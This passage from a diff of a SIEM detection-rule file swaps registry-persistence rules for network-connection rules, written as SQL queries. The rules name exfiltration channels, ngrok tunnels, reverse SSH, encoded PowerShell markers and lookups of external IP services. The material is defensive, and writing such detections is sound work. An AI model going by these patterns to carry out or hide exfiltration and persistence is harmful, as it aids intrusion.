troubleshooting or network monitoring" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((NewValue LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR NewValue LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((DestinationHostname LIKE '%api.2ip.ua%' ESCAPE '\\' OR DestinationHostname LIKE '%api.ipify.org%' ESCAPE '\\' OR DestinationHostname LIKE '%bot.whatismyipaddress.com%' ESCAPE '\\' OR DestinationHostname LIKE '%canireachthe.net%' ESCAPE '\\' OR DestinationHostname LIKE '%checkip.amazonaws.com%' ESCAPE '\\' OR DestinationHostname LIKE '%checkip.dyndns.org%' ESCAPE '\\' OR DestinationHostname LIKE '%curlmyip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%edns.ip-api.com%' ESCAPE '\\' OR DestinationHostname LIKE '%eth0.me%' ESCAPE '\\' OR DestinationHostname LIKE '%freegeoip.app%' ESCAPE '\\' OR DestinationHostname LIKE '%icanhazip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ident.me%' ESCAPE '\\' OR DestinationHostname LIKE '%ifconfig.io%' ESCAPE '\\' OR DestinationHostname LIKE '%ifconfig.me%' ESCAPE '\\' OR DestinationHostname LIKE '%ip-api.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ip.anysrc.net%' ESCAPE '\\' OR DestinationHostname LIKE '%ip.tyk.nu%' ESCAPE '\\' OR DestinationHostname LIKE '%ipaddressworld.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipecho.net%' ESCAPE '\\' OR DestinationHostname LIKE '%ipinfo.io%' ESCAPE '\\' OR DestinationHostname LIKE '%ipof.in%' ESCAPE '\\' OR DestinationHostname LIKE '%ipv4.icanhazip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipv4bot.whatismyipaddress.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipwho.is%' ESCAPE '\\' OR DestinationHostname LIKE '%l2.io%' ESCAPE '\\' OR DestinationHostname LIKE '%myexternalip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%wgetip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%whatismyip.akamai.com%' ESCAPE '\\' OR DestinationHostname LIKE '%wtfismyip.com%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "registry_set_susp_reg_persist_explorer_run.yml" + "filename": "net_connection_win_susp_external_ip_lookup.yml" }, { - "title": "Scripted Diagnostics Turn Off Check Enabled - Registry", - "id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", - "status": "experimental", - "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Rundll32 Internet Connection", + "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", + "status": "test", + "description": "Detects a rundll32 that communicates with public IP addresses", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.011", + "attack.execution" ], "falsepositives": [ - "Administrator actions" + "Communication to other corporate systems that use IP addresses from public address spaces" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\ScriptedDiagnostics\\\\TurnOffCheck' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\') OR CommandLine LIKE '%PcaSvc.dll,PcaPatchSdbTask%' ESCAPE '\\' OR SourceHostname LIKE '%.internal.cloudapp.net' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND DestinationPort = '443')))" ], - "filename": "registry_set_enabling_turnoffcheck.yml" + "filename": "net_connection_win_rundll32_net_connections.yml" }, { - "title": "Suspicious Environment Variable Has Been Registered", - "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", - "status": "test", - "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", + "title": "HH.EXE Network Connections", + "id": "468a8cea-2920-4909-a593-0cbe1d96674a", + "status": "experimental", + "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence" + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (NewValue IN ('powershell', 'pwsh') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR NewValue LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR NewValue LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%SW52b2tlL%' ESCAPE '\\' OR NewValue LIKE '%ludm9rZS%' ESCAPE '\\' OR NewValue LIKE '%JbnZva2Ut%' ESCAPE '\\' OR NewValue LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR NewValue LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR NewValue LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (NewValue LIKE 'SUVY%' ESCAPE '\\' OR NewValue LIKE 'SQBFAF%' ESCAPE '\\' OR NewValue LIKE 'SQBuAH%' ESCAPE '\\' OR NewValue LIKE 'cwBhA%' ESCAPE '\\' OR NewValue LIKE 'aWV4%' ESCAPE '\\' OR NewValue LIKE 'aQBlA%' ESCAPE '\\' OR NewValue LIKE 'R2V0%' ESCAPE '\\' OR NewValue LIKE 'dmFy%' ESCAPE '\\' OR NewValue LIKE 'dgBhA%' ESCAPE '\\' OR NewValue LIKE 'dXNpbm%' ESCAPE '\\' OR NewValue LIKE 'H4sIA%' ESCAPE '\\' OR NewValue LIKE 'Y21k%' ESCAPE '\\' OR NewValue LIKE 'cABhAH%' ESCAPE '\\' OR NewValue LIKE 'Qzpc%' ESCAPE '\\' OR NewValue LIKE 'Yzpc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" ], - "filename": "registry_set_suspicious_env_variables.yml" + "filename": "net_connection_win_hh.yml" }, { - "title": "Potential Registry Persistence Attempt Via Windows Telemetry", - "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", - "status": "test", - "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - "author": "Lednyov Alexey, oscd.community, Sreeman", + "title": "Script Initiated Connection to Non-Local Network", + "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "status": "experimental", + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", + "author": "frack113, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (NewValue LIKE '%.sh%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.bin%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.cmd%' ESCAPE '\\' OR NewValue LIKE '%.js%' ESCAPE '\\' OR NewValue LIKE '%.ps%' ESCAPE '\\' OR NewValue LIKE '%.vb%' ESCAPE '\\' OR NewValue LIKE '%.jar%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.msi%' ESCAPE '\\' OR NewValue LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((NewValue LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR NewValue LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" ], - "filename": "registry_set_telemetry_persistence.yml" + "filename": "net_connection_win_script_wan.yml" }, { - "title": "Potential Persistence Via Scrobj.dll COM Hijacking", - "id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", + "title": "Suspicious Outbound SMTP Connections", + "id": "9976fa64-2804-423c-8a5b-646ade840773", "status": "experimental", - "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Legitimate use of the dll." + "Other SMTP tools" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%InprocServer32\\\\(Default)' ESCAPE '\\' AND NewValue LIKE 'C:\\\\WINDOWS\\\\system32\\\\scrobj.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((DestinationPort IN ('25', '587', '465', '2525') AND Initiated = 'true') AND NOT (((NewProcessName LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\HxTsr.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_scrobj_dll.yml" + "filename": "net_connection_win_susp_outbound_smtp_connections.yml" }, { - "title": "Registry Modification to Hidden File Extension", - "id": "5df86130-4e95-4a54-90f7-26541b40aec2", - "status": "test", - "description": "Hides the file extension through modification of the registry", - "author": "frack113", + "title": "Communication To Ngrok Tunneling Service", + "id": "1d08ac94-400d-4469-a82f-daee9a908849", + "status": "experimental", + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" ], "falsepositives": [ - "Administrative scripts" + "Legitimate use of ngrok" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)')))" + "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" ], - "filename": "registry_set_hidden_extention.yml" + "filename": "net_connection_win_ngrok_tunnel.yml" }, { - "title": "UAC Bypass via Sdclt", - "id": "5b872a46-3b90-45c1-8419-f675db8053aa", - "status": "experimental", - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", - "author": "Omer Yampel, Christian Burkard (Nextron Systems)", + "title": "RDP Over Reverse SSH Tunnel", + "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", + "status": "test", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" ], - "filename": "registry_set_uac_bypass_sdclt.yml" + "filename": "net_connection_win_rdp_reverse_tunnel.yml" }, { - "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", - "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", - "status": "experimental", - "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", - "author": "frack113", + "title": "Suspicious Program Location with Network Connections", + "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "status": "test", + "description": "Detects programs with network connections running in suspicious files system locations", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ "attack.command_and_control", "attack.t1105" @@ -34718,4656 +34576,4829 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" + "filename": "net_connection_win_susp_prog_location_network_connection.yml" }, { - "title": "Enabling COR Profiler Environment Variables", - "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", - "status": "test", - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "title": "Suspicious Network Connection Binary No CommandLine", + "id": "20384606-a124-4fec-acbb-8bd373728613", + "status": "experimental", + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.012" + "attack.defense_evasion" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" ], - "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + "filename": "net_connection_win_susp_binary_no_cmdline.yml" }, { - "title": "Potential Persistence Via App Paths Default Property", - "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", - "status": "experimental", - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (Network)", + "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "status": "test", + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.t1546.012" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", + "Network Service user name of a not-covered localization" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%iex%' ESCAPE '\\' OR NewValue LIKE '%Invoke-%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%regsvr32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" ], - "filename": "registry_set_persistence_app_paths.yml" + "filename": "net_connection_win_remote_powershell_session_network.yml" }, { - "title": "Blackbyte Ransomware Registry", - "id": "83314318-052a-4c90-a1ad-660ece38d276", - "status": "test", - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "author": "frack113", + "title": "Cmstp Making Network Connection", + "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", + "status": "experimental", + "description": "Detects suspicious network connection by Cmstp", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" ], - "filename": "registry_set_blackbyte_ransomware.yml" + "filename": "net_connection_win_susp_cmstp.yml" }, { - "title": "Potential Persistence Via MyComputer Registry Keys", - "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", - "status": "experimental", - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Dead Drop Resolvers", + "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "status": "test", + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "author": 